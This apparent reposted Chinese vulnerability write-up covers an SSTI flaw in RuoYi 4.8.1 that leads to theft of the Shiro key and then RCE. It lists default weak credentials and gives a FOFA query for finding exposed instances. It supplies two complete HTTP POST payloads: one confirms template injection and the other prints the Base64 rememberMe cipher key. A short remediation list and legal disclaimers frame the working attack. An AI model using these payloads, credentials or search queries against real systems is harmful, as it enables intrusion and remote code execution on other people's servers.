文章总结: 本文介绍了若依最新版本4.8.1的SSTI漏洞,攻击者可通过该漏洞绕过安全限制获取ShiroKey,最终实现远程代码执行。文章提供了漏洞验证POC、获取ShiroKey的方法以及常见弱口令,并建议通过打补丁、升级版本、增加WAF防护或关闭互联网暴露面等方式进行修复。
综合评分: 75
文章分类: 漏洞分析,漏洞POC,WEB安全,应用安全,漏洞预警
漏洞复现 | 若依最新版本4.8.1漏洞 SSTI绕过获取ShiroKey至RCE【附poc】
实战安全研究
2025年12月4日 00:04
广东
免责声明
| |
| — |
| 本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢! |
|
|
|
|
一、描述
一直想做一款后台管理系统,看了很多优秀的开源项目但是发现没有合适的。于是利用空闲休息时间开始自己写了一套后台系统。如此有了若依。她可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错概率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。
性别男,若依是给女儿取的名字(寓意:你若不离不弃,我必生死相依)
若依是一套全部开源的快速开发平台,毫无保留给个人及企业免费使用。
二、影响版本
影响的版本4.8.1,常见弱口令
admin/adminadmin/admin123admin/123456ry/123456ruoyi/123456
三、fofa语法
(icon_hash="-1231872293" || icon_hash="706913071")
四、检测POC
验证poc
POST /monitor/cache/getNames HTTP/1.1Host: Cookie: JSESSIONID=df19949a-220d-4b25-aaaa-5d5568f6d721User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 57
fragment=__|$${#response.getWriter().print('123456')}|__::.x
获取shirokey
POST /monitor/cache/getNames HTTP/1.1Host: Cookie: JSESSIONID=df19949a-aaaa-4b25-8437-5d5568f6d721User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 60
fragment=__|$${#response.getWriter().print(@securityManager.getClass().forName('java.util.Base64').getMethod('getEncoder').invoke(null).encodeToString(@securityManager.rememberMeManager.cipherKey))}|__::.x
使用获取到的key,放到工具里测试下:
五、漏洞修复
1、建议联系厂商打补丁或升级版本。
2、增加Web应用防火墙防护。
3、关闭互联网暴露面或接口设置访问权限。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:实战安全研究 《漏洞复现 | 若依最新版本4.8.1漏洞 SSTI绕过获取ShiroKey至RCE【附poc】》